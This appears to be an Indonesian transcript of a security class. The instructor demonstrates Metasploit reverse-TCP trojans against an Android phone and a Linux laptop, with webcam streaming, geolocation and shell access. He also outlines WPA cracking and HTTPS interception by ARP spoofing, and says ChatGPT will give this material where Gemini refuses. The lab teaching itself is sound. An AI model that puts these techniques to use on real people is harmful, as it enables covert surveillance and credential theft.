Oke, kita mulai lagi ya. Oke, ini saya udah keluar. Ini ada pertanyaan dari Dino. Kalau mau baca debug atau data-data apa yang dikirim sebuah aplikasi ke aplikasi ke API-nya gimana? Kayak aplikasi absensi mungkin. Oh, ada bocorannya. Ini kalau jadi ini aplikasinya nih teknik forensik segala macam yang ini lebih sifatnya statik ya, bukan di jaringannya. Jadi kita cuma ngelihat permissionnya segala macam. Tapi kalau pengen lihat komunikasinya, mau nggak mau sih disadap sih sebenarnya. Paling gampang pakai Wireshark. Jadi kita jalanin si aplikasi terus pakai Wireshark kita monitoring dia connect kemana aja. Jadi kira-kira kayak gitu. Nah, yang seru adalah saya udah pernah ngajarin Wireshark kan ya. Jadi Wiresharknya intinya di Wireshark kita harus filter terhadap si IP source-nya dari si handphone, kira-kira kayak gitu. Ntar bisa dilihat di sini nggak ya? Kalau ini di Kali Linux ya. Ini Kali Linux, saya coba jalanin Wiresharknya, bisa jalan kagak nih ya? Oke, dia coba loading. Jadi kita kalau boleh saran sih kita bikin jaringan tertutup aja jadi jaringan yang nggak ada aplikasi lain, cuman aplikasi kita sama si HP itu. Nah udah itu di capture kayak gini aja, start capture. Kita monitoring. Jadi pastikan si Wiresharknya di kabel yang sama atau di WiFi yang sama dengan si handphone yang kita lagi analisa. Jadi paling gampang gitu sih. Ini paling gampangnya ya. Kalau mau ngelihat yang dia komunikasi kemana, browser kalau nggak salah bisa sih, coba lihat. Saya belum pernah pakai serius browser. Nih ya, browser ini harusnya bisa. Coba. Ini harus dicoba-coba. Saya belum pernah nyoba serius sih soalnya. Ini izin, dia lebih ke arah izin kayak gitu. Nah si browser mana? Ini browser. Nih. Content provider kita. Jadi content provider itu dia komunikasi sama si database sebelah sananya. Jadi dia bisa mengeksploitasi itu sih, si browser. Cuman saya belum nyoba nih. Kalau mau nyoba harus bikin aplikasi itu buat komunikasi. Ini contoh yang tadi aplikasi yang pakai App Inventor, dia komunikasi ke Google sih sebenarnya. Karena text to speech-nya ada di Google, bukan di aplikasi itu. Jadi kita harus masukin teks, klik button, nanti dia akan komunikasi ke Google biar dapetin suaranya. Nah ini bisa dilihat pakai kayak gini-ginian sih, query-nya apa segala macam. Bagaimana dia komunikasinya bisa dilihat di sini. Cuman harus install browser gitu. Nih nggak sempat saya kerjain nih. Saya juga belum nyoba serius. Cuman baca-baca doang, tulis di sini. Jadi saya kerjanya gitu aja. Baca-baca, tulis, cobainnya sambil ngajar. Bisa gagal kayak minggu lalu gagal. Akhirnya ketahuan. Masalahnya blow on, kabelnya jelek. Itu aja sih. Oke, kita coba ya. Kita akan coba komunikasi ke set payloadnya Android. Coba. Tadi Androidnya nggak ada. Nggak tahu kenapa ya. Coba kita lihat. Ini kita tutup aja. Continue without saving. Oke. Clear. Iyalah. Clear. MSF Console lagi. Oke, kita masuk ke MSF Console. Kita uji nyali percobaan. Ini si MSF Venom bisa kita bikin. Ini kebetulan yang kita serang adalah Android. Kalau di Android bisa dipasang keylogger ya bisa lah. Bisa. Di Android bisa dipasangin keylogger
Tinggal nyari aja. Kalau mau gombal sih nyari di GitHub kali ada ya, pakai doa lah. Ini GitHub suka marah sama saya, jadi pakai doa mudah-mudahan GitHubnya nggak marah ke saya. Keylogger Android. Kemungkinan kayak gitu-gituan nggak diinstal di ini ya, tidak ada di Play Store. Jadi kita harus nyari di source seperti ini. Jadi ada 139 keylogger Android yang bisa kita download. Ini bentuknya source code. Kebanyakan Java, berarti kita pakai Android Studio, kita bisa compile, kita bisa modif, kita bisa compile. Ini contohnya keyloggernya kirim pakai email, jadi bisa banget. Tapi nggak ada di Play Store. Ginian nggak akan dijamin nggak akan ada di Play Store lah, kayak ginian mah gila. Kalau Play Store pasang ginian mah geblek banget. Gitu. Kalau mau geblek lagi yang tadi Red Android. Red itu adalah remote akses Trojan, ada 1900 source code-nya, bisa kita download, bisa kita compile. Jadi remote access Trojan itu yang kita kerjain barusan, itu kategorinya remote access Trojan. Cuman kalau yang ini kita compile dari source code, kebanyakan Java karena ditaruh di Android, gitu ya. Coba ada nggak Red buat Windows? Kayaknya ada sih Windows. Cuman lebih dikit, cuman 698, pakai C#, bisa diinstal di Windows. Cuman ini Red Windows juga bisa kita buat di Kali Linux, pakai MSF Venom. Tadi MSF Venomnya kita bikin pakai Android ya. Kita bisa buat Windows, buat Linux segala macam juga bisa sih sebenarnya MSF Venom. Jadi kita bisa bikin backdoor, Trojan. Ini kategorinya Trojan sih, bukan backdoor. Kita bikin Trojan, bisa buat Android, bisa buat Windows, bisa buat Linux segala macam. Oke. Tapi kalau mau bikin ngompil dari source code, ini kebanyakan source code-nya C# sama Python nih kayaknya. Dua ini yang dipakai banyak kalau di Windows ya. Coba ada nggak buat Linux? Ada pasti. Pokoknya harus ngerti keyword sih sebenarnya. Nih ada lebih dikit, 230. Jadi ada, buat Linux juga ada, Windows ada, Android juga ada. Yang banyaknya Android karena Android itu paling menyenangkan buat diserang gitu ya. Makanya gue males pakai HP. Soalnya udah tahu banyak yang brengsek. Jadi males banget. Oke, jadi sip, bisa dipakai buat melakukan hal-hal yang membuat kita masuk neraka dengan baik, bisa di sini. Oke, beres. Sip. Sekarang kita akan Oke, kita akan masuk ke sini Kali Linux. Ini udah masuk. Ini saya ini nih. Oke, saya udah MSF Console sudah. Oke, ini use exploit ini multi handler. Paste. Oke. Sekarang payloadnya Android Metaplotter. Ini udah jelas-jelas Android, kenapa dia nggak mau tadi ya? Bego dasar. Ini pakai doa nih, mudah-mudahan bener nih. Tuh kan, payloadnya Android ya, berarti dia harus ngomong dengan Android bisa. Kalau payloadnya bukan, nah udah gitu set IP. Iyalah. Oh, saya udah di Linux, lupa. Set host 192.168.0.212, set L port 8888, dah masuk exploit. Kalau saya ketik exploit, dia udah standby, siap nerima sambungan dari HP. Saya coba masuk ke HP-nya, saya coba jalanin aplikasinya lagi. Oke, ini ada yang mulai masuk. Session 1 open. Saya udah masuk Metaplotter, coba saya tulis hub dulu. Nah, ini masuk Android beneran nih udah. Oke. Ini ada activity start, check root, dump callloc, dump contact, dump SMS, geolocate, interval collect, send SMS, set audio mode, SQL query, kita bisa ngomong sama database yang ada di situ. WLAN geolocate, kita lihat ininya ya. Coba kita cek geolocate.
Mau nggak deh? Wah, dapat langsung. Ini lokasinya kelihatan segini. Coba gua pakai ini. Gue pengen tahu dia bener nggak lokasinya ya. Ini rumahnya Ono dapat kagak? Kalau dia jago dapat nih rumahnya Ono. Copy selection. Saya masuk ke sini. Sini. Oke. Sialan loh. Oke, kebangsa saya pakai cara gombal aja. Ini saya ambil ininya aja, lokasinya aja. Dia nggak mau. Oke, saya mau ke Google Map aja ya. Maps, google.com. Dia nggak mau ngomong ke API-nya. Saya nggak punya otoritas buat masuk ke API-nya. Masuk ke developer lagi. Rese lu. Map. Oh, API soalnya. Google.com tanpa API. Jadi saya nggak masuk ke developer. Oke, saya udah di Google Map. Saya ambil koordinatnya doang. Coba, pengen tahu aja. Google bener kagak nih? Nih, kalau bener dia harus nunjuk ke rumah saya ya. Anjrit bener. Goblok. Oke, jadi bener. Saya zoom in. Jadi saudara-saudara, ini rumahnya Ono. Kalau mau ngirim hadiah atau apa, setoran, silahkan kirim ke sini ya. Lemot. Nah ini dia. Oh nih lokasinya di sini lah. Tapi bukan kos yang Abdillah, seberangnya kos Abdillah lah. Jadi bener lokasi yang dikirim sama Androidnya bener. Coba kita yang kerjaan yang lucu-lucu lagi. Oke, kita bisa app install, app list, bisa lihat list apa aja. Coba app list. Udah nggak mau ngomong dia. Sambungannya lepas. Mau app list. Ini aplikasi apa aja yang ada di sini kelihatan semua. Oke. Kalau ini help lagi aja. Ini saya lagi komunikasi pakai, jadi gini nih ceritanya. Si Kali Linux lagi komunikasi pakai kabelan. Kali Linuxnya kabelan masuk ke WiFi di rumah saya. Si Androidnya pakai WiFi masuk ke rumah. Jadi yang Android pakai WiFi, Kali Linux pakai LAN gitu ya. Saya bisa send SMS kalau mau. Saya bisa coba stream audio, bisa nggak? Ini nggak ada webcamnya, lihat. Oh ini dia ada. Kita bisa record mikrofon. Kita bisa webcam stream, list, webcam snap, webcam stream bisa juga. Kita bisa screenshot. Coba kita lakukan webcam. Tapi ini nggak bagus kameranya, kamera butut. Webcam list. Kita bisa ada nomor 1 depan, 2 belakang. Coba saya ambil yang back aja ya. Webcam snap nomor 1 ya. Depan belakang yang mana ya? Yang back kayaknya yang depan tuh yang ngadep ke kita ya. Yang front ngadep ke kita ya. Kita yang back aja, kita snap. Oke. Snap. Oh, snap tuh cuman ngambil foto ya. Oh alah. Ini lagi arahnya gini, salah. Coba lagi ulang. Ini mah foto. Ini foto doang nih. Kalau snap foto. Kita stream aja ya. Webcam stream 1. Ini stream. Kalau ketik WhatsApp, wah, dia nggak mau nyetrim ke ini saya, sialan lu. Tidak mau stream ke, sorry, di sini ya. Mana ini saya teh? Oh ini dia. Oke. Cobain. Klik WhatsApp. Ntar. Ini lagi penasaran.
Ini nyetrim ke ini ya. eh dia Oke, dia bisa diakses di sini. Jadi saya akan buka copy selection, saya buka ini, saya akan buka di sini. Nah, ini adalah layarnya. Sorry gelap karena emang nggak terang di ruangan ini sebetulnya. Nah, ini bisa kita lihat sih dia streaming. Wah, ini tadi ini printer. Oh, salah ya, harus gini ya. Gitulah, rada butut lah. Tapi bisa ngelihat lah dia ada video yang bisa dikirim nih, streaming videonya sih. Kira-kira kayak gitu. Terus ya, tapi nggak gitu bagus. Dia bisa record mic segala macam. Oke. Sekarang pertanyaannya, apakah kita bisa masuk WhatsApp? Masuk WhatsApp bisa sih sebenarnya. Bentar. Ini pasti udah pikirannya udah pada jahat semua nih, udah kelihatan nih. Background session, yes. Oke. Ya, putus komunikasi. Ya, putus. Harus di ini ulang lagi sih. Exploit mau nggak ya? Ini harus coba, mau nggak dia komunikasi lagi ulang? Oke. Oke. Help. App list. Oke. Kita bisa lihat. Ini aplikasi yang ada. Kita cuma tinggal cari ada WhatsApp nggak di sini. Harusnya ada sih. Ini nggak diinstal WhatsApp, minta maaf. Lupa. Ini Android kosong. Jadi nggak ada WhatsApp-nya sama sekali, jadi saya nggak bisa jalin WhatsApp. Tapi kira-kira bentuknya kayak gini-gini ntar. Kalau YouTube ini Google Android YouTube. Jadi kita bisa, ini WhatsApp kagak ada ya. Wallpaper, wearable, manage installer, weather, wifi direct. Tapi WhatsApp-nya nggak ada, karena saya ini handphone baru. Kita bisa jalin WhatsApp juga dari sini sih sebenarnya. Kalau kita lihat help, di sini ada application run. Kita bisa run aplikasi, bisa uninstall, bisa. Kalau mau jahat kita uninstall aja. Gitu. Kalau mau gombal banget sih sebetulnya bisa run WhatsApp, terus kita bisa mudah-mudahan, tapi nggak tahu ya, mudah-mudahan bisa ini sih, harusnya bisa kan kita bisa dari device lain bisa masuk ke WhatsApp-nya kita ya, pakai web WhatsApp kayak gitu. Jadi pakai web WhatsApp di ini aja, diklik biar bisa masuk ke web WhatsApp, kira-kira kayak gitulah. Tapi ini brengsek banget di sini. Oke. Kira-kira ini mudah-mudahan udah kebayang. Oke. Silakan diobok-obok. Ini quit. Ini beres. Ntar ada yang kurang nggak? Kita akan nyoba yang agak ngaco lagi. Oke. Ini quit lagi. Ini barusan exit minus y. Barusan yang kita lakukan adalah, ini tutup dulu. Yang kita lakukan adalah bikin Trojan buat ini ya, buat handphone Android. Bisa nggak kita bikin Trojan buat Linux atau Windows? Tapi saya nggak bisa Windows di sini, nggak ada komputer Windows. Minta maaf. Beda aliran, jadi nggak suka sama Windows karena nggak bagus. Jadi saya pakai Linux. Kita akan bikin Trojan buat Linux, bisa jalan nggak Trojannya? Oke. Jadi caranya nggak akan beda jauh sebetulnya. Coba bentar. Saya pernah bikin, tapi saya lupa. Udah saya catat atau belum ya? MSF Venom. Pakai MSF Venom. Tapi bukan buat APK. Ini rata-rata buat APK semua nih. Ya udah. Kalau enggak, kayak saya masuk ke MSF aja sini. Saya akan bikin catatan. Attack desktop.
Oh, ini mah bukan. Saya bikin ini baru lagi aja ya. Saya pernah nyoba jalan, nggak masalah. MSF Venom untuk Linux. Kita uji coba percobaan. Yang cara paling blow on adalah pakai ChatGPT. Kalau udah kayak ginian biasanya Gemini di Google nggak mau. Jadi Gemini dikasih proteksi, dia nggak akan mau ngasih hal-hal yang membuat kita masuk neraka. Jadi yang kemungkinan masih mau ngasih adalah si ChatGPT. Di sini ada buat MSF Venom. Jelaskan penggunaan MSF Venom untuk attack remote access Trojan di Ubuntu. Oke. Membuat payloadnya kita pakai MSF Venom. Nah, ini dia beda. Kalau tadi kan saya Android ya. Payloadnya Android, ini Linux x86. Nah ini mirip tapi payloadnya Linux x86. Udah gitu dia jalanin. Nah sekarang execute-nya harus payload F. Jadi ini file payloadnya di generate sama si MSF Venom. Ini saya copy paste dulu ya, biar nggak mau rugi biasa. Mana sih tadi? Ini ya. Oke, paste dulu sini. Ya, siap. Begitu teknik untuk membuat materi kuliah. Jadi materi kuliah gampang banget bikinnya, sebenarnya cuma gini doang. Biar serem lah. Saya taruh di wiki aja. Oke. Kita bikin remote access Trojan. Tapi yang penting sebenarnya bukan ini sih. Yang penting sih kita harus ngerti keyword-keyword yang kita pakai. Kalau kita nggak ngerti keywordnya, kita nggak akan bisa bikin. Saya kelihatan gampang ya bikinnya. Soalnya saya ngerti keywordnya. Jadi keywordnya harus bener supaya si ChatGPT-nya bener ngasihnya. Oke. Saya masuk sini. Ini buat MSF Venom itu apa? Oke, udah. Terus cara bikin payloadnya pakai MSF Venom. Oke. Perintah untuk membuat keyword. Ini bash saya buang. Ini formatnya si ChatGPT agak beda sama formatnya wiki. Ini saya masuk ke penjelasan. Ini saya kasih bintang di sini. Kalau wiki sukanya bintang soalnya. Dia nggak suka minus. Oke. Terus kita itu udah bikin payloadnya. Sekarang saya akan bikin listenernya yang buat dengerin di kali Linuxnya. Langkahnya nggak susah. Pertama kita sama jalanin meta MSF console kayak tadi. Terus kita jalanin listenernya. Pertama use exploit multi-handler. Payloadnya Linux x86 meterpreter, terus lhost sama lport sama exploit. Nah kalau udah dijalankan, kita harus menyebarkan si payload ke target. Jadi kalau udah kayak gini si Gemini Google nggak mau ngasih. Kalau si si ChatGPT ngasih masih. Jadi masih enak sih pakai ChatGPT daripada pakai Google. Google terlalu ini sih. Terlalu pengen semua orang masuk surga. Ya udah kayak gini nggak dikasih. Ini kalau kita berhasil connect, kita tinggal kasih perintah sysinfo, tapi ini bisa di help aja, bisa keluar sih sebenarnya. Shell, upload, download, exit. Oke, ini tip keamanannya, jangan install sembarangan lah, intinya mah gitu aja sih. Oke, sekarang saya akan save dulu makhluk ini. Sekarang saya akan praktekkan. Ini masih belum bagus, nanti harus di layoutnya dibagusin lagi. Oke, sekarang saya akan masuk ke sini.
masuk ke wiki. Oke, udah masuk ke wiki. Saya akan masuk ke MSF. MSF adalah Metasploit Framework. Itu tool yang paling cool banget di Kali Linux. Ini salah satu hobi saya sih sebenarnya pakai yang ini sih. Soalnya mau ngapa-ngapain enak banget lah, kagak pakai otak banget kalau yang ini mah. Kenapa kagak masuk ke MSF-nya? Yeah. Ini dia. Huruf besar maunya. Ntar saya bikin link buat kayak huruf kecilnya juga dah. Saya masuk ke desktop. Di sini sudah ada MSF Venom untuk Linux. Oke, sekarang MSF dia bisa bikin buat exe, buat APK, PHP, bash segala macam. Kalau Linux biasanya ELF formatnya. Saya akan bikin ininya ELF. Nama filenya adalah payload.elf. Oke. Sekarang saya akan masuk ke sini, clear layar. Oke, IP hostnya, L hostnya adalah 192.168.0.212. Ini IP addressnya si Kali Linux ya. Portnya masih saya bikin sama aja, biar nggak usah mikir. 8888. Saya kasih nama, formatnya -F, formatnya ELF. Filenya namanya payload.elf. Ya, kita jalanin MSF Venomnya buat bikin payload.elf. Nah, nanti kita harus nipu komputernya supaya dia nginstall. Kalau Linux sih agak susah sebenarnya ditipunya. Orangnya rata-rata pintar kalau yang pakai Linux. Nah, kalau yang kayak gini harusnya yang exe di Windows. Nah, itu lebih gampang ditipunya. Oke. X86 for payload. Oke, dia udah outputting raw payload 128 byte aja. Sadis ya payloadnya 128 byte. Kita copy bintang elf. Saya copy ke ono at 192.168.190.2. Saya copy masukin ke home directory-nya dia. Dia udah masuk ke home directory. Sekarang saya harus masuk MSF console di sini. Come on. Oke, dia loading. Sekarang saya ini udah masuk ke MSF console. Ini harus dibuang titik-titiknya. Kita harus kerjain yang ini. Use exploit multi-handler sama yang tadi. Payloadnya aja beda. Kalau tadi kan Android Meterpreter reverse TCP. Sekarang akan saya pakai Linux x86. Lhost, Lportnya sama, terus exploit. Nanti kira-kira bentuknya sama. Nah, ini payloadnya harus dikirim ke mesin sana. Udah dikirim, tinggal chmod supaya bisa di-execute payload elf-nya tadi. Terus payload kita jalankan. Kira-kira kayak gitu. Oke. Nah, sebelum itu kita lakukan, kita standby-in dulu si. Oke, bentar lagi, belum, lagi loading. Masih loading. Saya akan masuk ke sana. Oh, ini udah di Dell. Remove backdoor APK. Aduh, ribet ya. Ini udah jorok banget nih, harus di format. Remove backdoor APK, remove test APK, remove soal IPA. Ini udah. Yang diniah itu bagus, jadi nggak saya cook. Kayak buang. SCP data. Ini mau saya backup dulu bentar. 803. Remove data. Jadi ini kasih cerita dikit aja yang data model Diniah itu pesantren di Padang Panjang. Ini kepala sekolahnya datang ke saya langsung. Dia pengen nganalisa siswanya. Ini data-data siswanya, dia pengen bisa prediksi ini siswa ini udah soleh belum.
Ini Dinia Putri ya, maksudnya dia bukan jadi santrinya Putri. Ini kepala sekolahnya dia punya data, dia pengen dengan data itu dia bisa prediksi si santrinya apakah sudah soleh atau belum soleh segala macam gitu, pakai AI. Datang ini kepala sekolahnya langsung lagi S3 di Malaysia. Pembimbing di Malaysia nya nggak bisa ngajarin, parah. Akhirnya ngadain ono juga, parah dah. Percuma lah lu di Malaysia. Oke, tadi mana elfnya? Remove nano. Saya buang-buangin yang jelek-jeleknya. Mana file elf teh? Oh ini dia nih payload elf-nya. Oke, payload elf sudah ada di sini. Kita bisa jalankan. Coba. Ini udah beres. Sekarang kita jalanin dulu bentar. Oke, sudah masuk. Saya gedein. Oke, sekarang saya harus masuk sini. Use exploit multi-handler. Klik kanan copy. Paste. Oke. Terus dia set payload Linux x86 Meter-Preter reverse TCP. Harus dipastiin x8. Ini dia lagi payloadnya generic shell reverse TCP ya. Itu yang bikin kacau. Sekarang set payload ke situ, payloadnya diganti jadi Linux x86 Meter-Preter reverse TCP. Terus kita set lhost sama lport. Set lhost 192.168.0212. Set lport 8888. Exploit. Oke. Dia standby, dia lagi nunggu sambungan dari si Kali Linux-nya. Sekarang saya akan, ini mah di ini. Ya, si HP masuk. Ngaco HP lu. Saya matiin dulu nih, ini HP yang masuk, kacau lu HP. Ininya masuk lagi deh. Saya shutdown dulu, power off. Diulang lagi dah bagian yang ini. Oke, ulang lagi. Quit dulu, ulang. HP-nya masuk, soalnya HP-nya nggak dimatiin si ini. Nah itu masalah di HP ya, bukan masalah. Artinya kalau kita udah keinstall payload di sebelah sana, HP-nya nyala, payloadnya akan komunikasi lagi ke kita loh, hati-hati. Itu masalah sih. Jadi kalau kita sudah nginstall, bukan payload maksud backdoor, Trojan udah keinstall, dia akan berusaha komunikasi terus ke kitanya sih. Itu masalah sih. Oke, lagi loading, nih udah masuk. Coba, nah ini use exploit multi-handler. Sekarang saya akan use nih, salah, ini Android. Ya nggak bisa, saya copy paste aja lagi lah nih. Jadi kalau mau iseng buat Windows ya kita bikin payloadnya buat Windows aja, install. Sekarang set lhost 192.168.0.212, set lport 8888, exploit. Oke, dia lagi standby, nggak ada sambungan yang masuk. Sekarang saya akan masuk ke sini. Payload elf-nya sudah ready, saya akan masuk ke sini. Saya harus chmod dulu elf-nya supaya bisa di run. Kasih mode-nya supaya bisa di-execute, plus X itu artinya bisa di-execute. Jadi harus belajar permission di Linux juga ya. Kita udah ganti bisa di-execute. Sekarang saya akan jalankan /payload elf itu jalan. /payload elf. Dia jalan, coba kita lihat di sebelah sininya. Dia udah mulai masuk ke ini ada Meter-Preter masuk. Sekarang kita coba help. Ini adalah perintah-perintahnya
yang bisa kita kirim ke sana. Sama kita bisa lihat webcam, snap segala, ada webcamnya soalnya di laptopnya. Kita bisa, cuman beda perintah sama ini ya. Kita bisa, perintahnya agak beda sama si Android, tapi perintahnya banyak juga. Oke. Download, LCD, make directory, PWD, ada cut nggak? Upload, edit, download segala macam ada di sini. Tapi di sini nggak ada ini ya, geolocate-nya nggak ada, jadi kita nggak tahu dia ada di mana karena si ini nggak ada. Oh, webcamnya juga ada. Coba webcam list. Gue ada 2 webcam. Baru tahu saya. Serius nih ada 2 webcam. Coba webcam. Ini gue baru tahu ada 2 webcam. Soalnya setahu saya cuma ada 1 webcam. Takutnya penipuan dia. Stream 2. Walah. Copy selection. Kita masuk ke sini. Kita coba. Alah. Nih. Oke. Wes, kelihatan Ono sedang sibuk di sini. Oke. Ini wes bergerak-gerak gitu. Jadi kelihatan kameranya. Gitu ya. Kepotong tapi. Jadi kira-kira gitu dah. Kita bisa ngelihat si kameranya bisa bergerak dan sebagainya. Gitu. Jadi cuman gitu doang sih. Oke, ini beres ya. Kalau ada pertanyaan silakan tulis di chat. Ada sysinfo segala macam. Coba kita lihat sysinfo ya. Iyalah, salah. Coba. Oke, sysinfo. Kita bisa lihat dia IP-nya berapa, sistem operasinya berapa, sektornya apa, segala macam bisa kita lihat. Shell, kalau kita mau akses ke shell. Iya, masuk ke shell loh. LS, PWD. Oke. ls/etc, kita bisa lihat isinya etc. more/etc apache 2. Salah. Apache dia nggak bisa nih. ls/etc apache 2. Wah, nggak bisa. Udah kacau. Karena more tadi. Yes. Oke, kira-kira kayak gitu. Jadi bisa diobok-obok. Sarannya sih sering-sering latihan sama ngobok-ngobok. Dari situ kita bisa tahu apa yang bisa kita kerjakan di sini. Tapi ini hacking semua ya urusannya. Tapi ilmu ini dibutuhkan supaya kita dapetin feel-nya kalau jadi hacker tuh seperti apa sih. Oke, ini beres. Sekarang kita ngelihat materi yang saya punya waktu berapa menit? Tinggal 7 menit deh. Ada rese. Oke. Sini PR yang belum dikerjain. Jadi ini udah beres, mobile hacking. Wireless networking susah. Ini susah saya kerjain. Saya kasih cerita aja yang ini ya. Karena susah dikerjainnya. Karena itu harus kali Linux-nya harus saya install di komputer sendiri. Nggak bisa pakai virtual komputer kayak sekarang. Karena dia harus bisa akses langsung ke wifi-nya. Ini nggak bisa. Dan itu saya pasti kesulitan buat ngerekam, nge-zoom tuh susah. Kalau ini dikerjakan di mana sih namanya? Di lab, di offline lebih gampang ceritanya. Ini kalau pakai zoom jadi puyeng kepala. Oke. Tapi ini saya cerita aja dulu lah. Biar salah klik. Intinya ada protokol buat security, enkripsi di WiFi ada beberapa, paling nggak ada 3, WEP, WPA, WPA2. Oke. Pada zaman dulu kala kita makanya WEP itu butuh waktu sekitar 5 menit buat ngejebolin.
WPA 2 udah lebih susah buat dijebolinnya. Kalau passwordnya ribet nggak bisa dijebol, dan WPA 2 ini biasanya ngejebolinnya pakai dictionary attack, jadi pakai daftar. Oke. Langkah umum buat ngejebolin WiFi, kita pakai Airmon NG. Coba di sini ada nggak Airmon NG? Ini quit dulu ya. Oke. Oke. Airmon NG. Jadi pakai Airmon NG ini, tapi ini nggak akan bisa jalan karena saya nggak konekin WiFi sama sekali ke Kali Linuxnya, nggak ada WiFi-nya. Jadi nggak bisa. Kalau mau ngeliat helpnya bisa dilihat di sini. Kita bisa lihat Airmon start, stop, check, interface, channel frekuensinya berapa, bisa di set di sini. Jadi kita start di WLAN 0. Kalau udah di start kita bisa monitor. Oke. Monitor di Mon 0. Jadi yang kita namanya makhluknya sama, dua-duanya di WLAN 0. Cuman buat monitor kita kasih nama interface baru namanya Mon 0. Kemudian kita bisa dapetin ininya, SSID-nya apa. Ini MAC address sih, BSSID kayak MAC address kayak gitu ya. Nah, kalau kita udah tahu targetnya, BSSID-nya, kita bisa tambahin kayak gini. Ini cara berpikirnya kira-kira gini. Kalau kita mau dapetin password dari WiFi, si klien akan tiap kali ngirim password pada saat WiFi-nya putus. Jadi kalau WiFi putus, dia berusaha connect kan. Waktu connect dia masukin password. Cuman itu kondisi di encrypt semua. Jadi kita harus nangkep paket-paket dari klien ke access point waktu dia mau dapetin password tadi. Oke. Jadi ini targetnya. Kemudian dia ini kalau kita pengen berusaha ngejebolin ininya dia, tapi kira-kira gini nih. Kita monitor dulu, disimpan semuanya di file capture. Oke. Udah gitu yang sering kita kerjakan adalah yang ini nih, di auth. Oke, jadi kita set MAC address dari si access point-nya berapa, kita akan serang. Untuk klien yang ini kita de-authentication. Jadi de-authentication artinya dilepasin, atau pakai fake authentication ke klien ini. Jadi kliennya ditipu habis-habisan, akibatnya kliennya jadi putus dari WiFi, dia berusaha nyambung terus. Pada saat nyambung pada saat dia berusaha nyambung, semuanya ditangkap. Jadi ini di capture. Oke. Nah, capture ini sama lah. Ini sama nih. Nah, kemudian kita jebolin pakai word list ini. Kira-kira gitu lah. Oke, jebolin. Cuman kalau WPA lumayan pening. Kalau passwordnya panjang nggak bisa. Ini nggak bisa. Kalau passwordnya pendek ada di word list ya jebol. Jadi caranya kalau mau demo, kita pakai WiFi bikin passwordnya 123456 misalnya, ya udah kita jebolin bisa. Tapi kalau passwordnya misalnya kita bikin syair lagu Indonesia Raya gitu, ya nggak bisa dijebolin gitu. Kira-kira kayak gitu sih. Beres ya. Jadi tekniknya ini aja, dan semua pakai command line di Linux, di Kali Linux. Cuman ini susah ini, nggak bisa didemoin, nggak bisa di zoom nggak mungkin. Soalnya saya harus punya sambungan ke Zoom sambil ngejebolin WiFi-nya itu sendiri, nggak bisa, tewas langsung. Dan itu harus dilakukan, Zoom-nya harus diinstal di Kali Linux, nggak bisa juga. Jadi ini susah, ini cuma bisa diceritain doang. Saya pernah nyobain sih, ini effortnya lumayan. Soalnya saya harus bikin access point buat diserang, apa segala macam. Kira-kira kayak gitu. Ini beres ya, ini caranya. Terus, wah udah jam segini lagi. Salah satu yang paling keren adalah yang ini sih sebenarnya, Man in the Middle Attack. Ini keren banget. Ini yang paling parah sih. Karena kalau passwordnya nggak ada di wordlist, apakah ada caranya dapat passwordnya, Prof? Ada caranya gampang. Pacarin yang punya WiFi, dapat tuh password.
nggak bisa, nggak bisa dapat sih sebenarnya, susah. Kalau passwordnya panjang ya susah. Kalau yang ini ceritanya lain, kalau yang ini MITM ceritanya Pak lain, MITM tuh ceritanya lain. Jadi kita ngejebolin orang lagi transaksi pakai HTTPS, bayar PayPal, bayar apa segala macam bisa dijebolin. Tekniknya kira-kira gini nih, tekniknya. Jadi ini WiFi ya, router WiFi. Ini ada user komunikasi lewat router ke internet. Nah, ini kita ada di sini, kita tipu si user, kita tipu si router. Si user kita bilangin saya adalah router, router kita bilangin saya adalah user. Jadi paket yang mau dikirim ke user dikirim ke kita dulu, baru dikirim ke sini, user juga kirim ke kita dulu, baru ke sana. Jadi konsepnya kayak gini caranya. Untuk nipu kita pakai ARP spoofing. Ini buat nipu nih. Jadi caranya nipunya kayak gini sih. Jadi nipu dua arah, dua-duanya ditipu. Paketnya ke kita, udah gitu kita jalanin yang ini. Ada MITM proxy, ada MITM SSH. Kalau SSH kalau ada orang SSH aja. Kalau proxy yang lebih horor karena dia bisa ini proxy, ini bisa jadi proxinya HTTPS. Ini saya cobain beneran jalan, ini kacau banget kalau ini. Asli ini kacau. Jadi caranya kayak gini aja. Jalanin. Nanti kalau kita masukin password di HTTPS, keluar di proxy ini, keluar. Ini passwordnya, keluar. Ini parah banget kalau ini. Jadi orang nyangka HTTPS aman. Kalau kita pakai kayak gini kan jebol. Gitu. HTTPS, tadi ada SSH juga, rasanya aman, jebol juga. Jadi ini jebolin parah. Tapi ini bukan ngejebolin WiFi ya, ini bukan WiFi yang dijebolin. Ini yang kita jebolin adalah password HTTPS, SSH, jebolin di sini. WiFi-nya nggak kita jebolin, kita nggak penting WiFi. Yang penting password buat masuk internet banking. Klik BCA misalnya. Wah, tapi enggak sih. Kalau klik BCA kan pakai ini ya, pakai token. Tokennya kan berubah-ubah terus. Nah, itu teknik ngejebolinnya lain lagi. Ngejebolinnya kita melakukan pakai burp suite, pakai proxy, terus kita tipuin si usernya bisa. Gitu. Sekarang udah jam 7 lebih. Ini buat kasih gambaran aja. Mudah-mudahan bisa bermanfaat sampai titik ini. Jadi ini saya bayar utang yang minggu lalu nggak jalan, sekarang jalan ya. Utang gua lunas. Oke, terima kasih banyak. Mudah-mudahan bisa bermanfaat. Billahi taufik wal hidayah. Assalamualaikum warahmatullahi wabarakatuh. Sampai ketemu minggu depan. Terima kasih. Waalaikumsalam warahmatullahi wabarakatuh. Waalaikumsalam.